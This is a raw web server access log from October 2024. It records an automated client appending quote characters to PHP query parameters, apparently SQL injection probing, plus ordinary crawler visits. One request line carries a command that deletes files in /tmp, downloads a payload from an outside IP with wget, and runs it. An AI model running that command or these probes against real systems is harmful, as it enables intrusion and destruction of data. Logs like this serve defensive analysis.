23.94.126.146 - - [04/Oct/2024:04:41:41 +0200] "GET /skupine.php?skupina=82'123 HTTP/1.1" 200 13091 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:41 +0200] "GET /skupine.php?skupina=124'123 HTTP/1.1" 200 13092 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:41 +0200] "GET /skupine.php?skupina=131'123 HTTP/1.1" 200 13092 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:41 +0200] "GET /skupine.php?skupina=133'123 HTTP/1.1" 200 13092 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:42 +0200] "GET /skupine.php?skupina=136'123 HTTP/1.1" 200 13092 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:42 +0200] "GET /info.php?sifra=dbm020&skupina=0'123 HTTP/1.1" 200 17540 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:42 +0200] "GET /info.php?sifra=kos 001&skupina=0'123 HTTP/1.1" 200 16899 "-" "Go-http-client/1.1"
23.94.126.146 - - [04/Oct/2024:04:41:43 +0200] "GET /info.php?sifra=23000&skupina=0'123 HTTP/1.1" 200 17211 "-" "Go-http-client/1.1"
66.249.66.43 - - [04/Oct/2024:05:04:24 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
41.40.34.65 - - [04/Oct/2024:05:11:52 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.80.139.104/jaws;sh+/tmp/jaws HTTP/1.1" 404 - "-" "Hello, world"
114.119.152.216 - - [04/Oct/2024:05:24:17 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
